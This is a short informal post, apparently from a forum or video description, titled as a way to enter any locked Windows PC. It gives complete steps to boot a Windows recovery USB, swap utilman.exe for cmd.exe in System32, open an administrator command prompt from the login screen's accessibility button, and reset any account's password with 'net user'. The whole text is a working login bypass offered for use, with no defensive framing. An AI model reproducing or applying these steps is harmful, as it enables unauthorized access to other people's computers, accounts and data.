How to enter any windows locked PC | USB W WINDOWS ISO NEEDED

Basically , insert the usb w windows recovery , press shift + f10 , on the cmd console do cd C , in cd C go into system32 and do this command : ren utilman.exe utilman.exe.bak and then after that command is done do : ren cmd.exe utilman.exe , after doing both of this commands restart ur computer and click on the utlitys button and u should get an admin CMD , from there net user username [The password u need here]. Works in win 10 and 11 , idk bout 7 and 8 , hope it helps you all!
